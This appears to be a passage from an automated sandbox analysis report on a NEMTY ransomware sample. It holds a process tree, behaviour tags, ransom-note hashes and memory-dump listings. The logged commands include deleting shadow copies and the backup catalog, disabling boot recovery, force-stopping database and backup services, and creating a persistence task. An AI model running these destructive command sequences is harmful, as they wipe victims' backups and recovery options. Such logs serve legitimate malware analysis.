C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im wordpad.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im outlook.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im thunderbird.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im oracle.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im onenote.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im virtualboxvm.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im node.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im QBW32.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im WBGX.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im Teams.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im Flow.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop OracleXETNSListener2⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop OracleServiceXE2⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop AcrSch2Svc2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop AcronisAgent2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop Apache2.42⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLWriter2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQLServerADHelper1002⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MongoDB2⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLAgent$SQLEXPRESS2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLBrowser2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop CobianBackup112⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop cbVSCService112⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop QBCFMontorService2⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop QBVSS2⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /create /sc onstart /tn "NEMTY_LTM73P4" /tr "C:\Users\Admin\AdobeUpdate.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /sc onstart /tn "NEMTY_LTM73P4" /tr "C:\Users\Admin\AdobeUpdate.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txt"2⤵
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txt3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txtMD5
87c36b4ecc22c87362a66277c2ad5532
SHA14110bef7d90f87d4356c07b2e0829e4ebe545fe6
SHA25690d26ae395048c54a95b5ef9bf9b14cd49f5148e7a033f1d2d7e2d70901b8a2e
SHA512a23f2752b3173cfa57cbbfe3efe75637b02465e16c97899df7f752808c9d0f013695db222474d3a1c0b34cde6667614807d0ee5c224cead10ad101513e850f72
-
memory/268-83-0x0000000000000000-mapping.dmp
-
memory/292-84-0x0000000000000000-mapping.dmp
-
memory/308-62-0x0000000000000000-mapping.dmp
-
memory/748-69-0x0000000000000000-mapping.dmp
-
memory/796-73-0x0000000000000000-mapping.dmp
-
memory/816-64-0x0000000000220000-0x0000000000238000-memory.dmpFilesize
96KB
-
memory/816-65-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/816-59-0x0000000075511000-0x0000000075513000-memory.dmpFilesize
8KB
-
memory/916-85-0x0000000000000000-mapping.dmp
-
memory/984-74-0x0000000000000000-mapping.dmp
-
memory/996-77-0x0000000000000000-mapping.dmp
-
memory/1012-75-0x0000000000000000-mapping.dmp
-
memory/1016-90-0x0000000000000000-mapping.dmp
-
memory/1044-67-0x0000000000000000-mapping.dmp
-
memory/1068-86-0x0000000000000000-mapping.dmp
-
memory/1352-66-0x0000000000000000-mapping.dmp
-
memory/1372-70-0x0000000000000000-mapping.dmp
-
memory/1376-68-0x0000000000000000-mapping.dmp
-
memory/1384-98-0x0000000000000000-mapping.dmp
-
memory/1396-79-0x0000000000000000-mapping.dmp
-
memory/1520-61-0x0000000000000000-mapping.dmp
-
memory/1524-88-0x0000000000000000-mapping.dmp
-
memory/1572-78-0x0000000000000000-mapping.dmp
-
memory/1588-80-0x0000000000000000-mapping.dmp
-
memory/1632-60-0x0000000000000000-mapping.dmp
-
memory/1644-82-0x0000000000000000-mapping.dmp
-
memory/1668-72-0x0000000000000000-mapping.dmp
-
memory/1752-76-0x0000000000000000-mapping.dmp
-
memory/1752-63-0x0000000000000000-mapping.dmp
-
memory/1776-81-0x0000000000000000-mapping.dmp
-
memory/1880-71-0x0000000000000000-mapping.dmp
-
memory/1968-87-0x0000000000000000-mapping.dmp
-
memory/2056-89-0x0000000000000000-mapping.dmp
-
memory/2068-97-0x0000000000000000-mapping.dmp
-
memory/2076-91-0x0000000000000000-mapping.dmp
-
memory/2088-92-0x0000000000000000-mapping.dmp
-
memory/2096-96-0x0000000000000000-mapping.dmp
-
memory/2104-93-0x0000000000000000-mapping.dmp
-
memory/2132-95-0x0000000000000000-mapping.dmp
-
memory/2164-94-0x0000000000000000-mapping.dmp
-
memory/2232-99-0x0000000000000000-mapping.dmp
-
memory/2240-100-0x0000000000000000-mapping.dmp
-
memory/2264-101-0x0000000000000000-mapping.dmp
-
memory/2280-102-0x0000000000000000-mapping.dmp
-
memory/2316-103-0x0000000000000000-mapping.dmp
-
memory/2348-105-0x0000000000000000-mapping.dmp
-
memory/2356-104-0x0000000000000000-mapping.dmp
-
memory/2372-106-0x0000000000000000-mapping.dmp
-
memory/2388-107-0x0000000000000000-mapping.dmp
-
memory/2400-108-0x0000000000000000-mapping.dmp
-
memory/2436-109-0x0000000000000000-mapping.dmp
-
memory/2456-110-0x0000000000000000-mapping.dmp
-
memory/2468-111-0x0000000000000000-mapping.dmp
-
memory/2488-112-0x0000000000000000-mapping.dmp
-
memory/2516-113-0x0000000000000000-mapping.dmp
-
memory/2524-117-0x0000000000000000-mapping.dmp
-
memory/2532-114-0x0000000000000000-mapping.dmp
-
memory/2544-115-0x0000000000000000-mapping.dmp
-
memory/2552-120-0x0000000000000000-mapping.dmp
-
memory/2568-125-0x0000000000000000-mapping.dmp
-
memory/2588-118-0x0000000000000000-mapping.dmp
-
memory/2600-116-0x0000000000000000-mapping.dmp
-
memory/2620-119-0x0000000000000000-mapping.dmp
-
memory/2652-124-0x0000000000000000-mapping.dmp
-
memory/2668-121-0x0000000000000000-mapping.dmp
-
memory/2672-122-0x0000000000000000-mapping.dmp
-
memory/2692-123-0x0000000000000000-mapping.dmp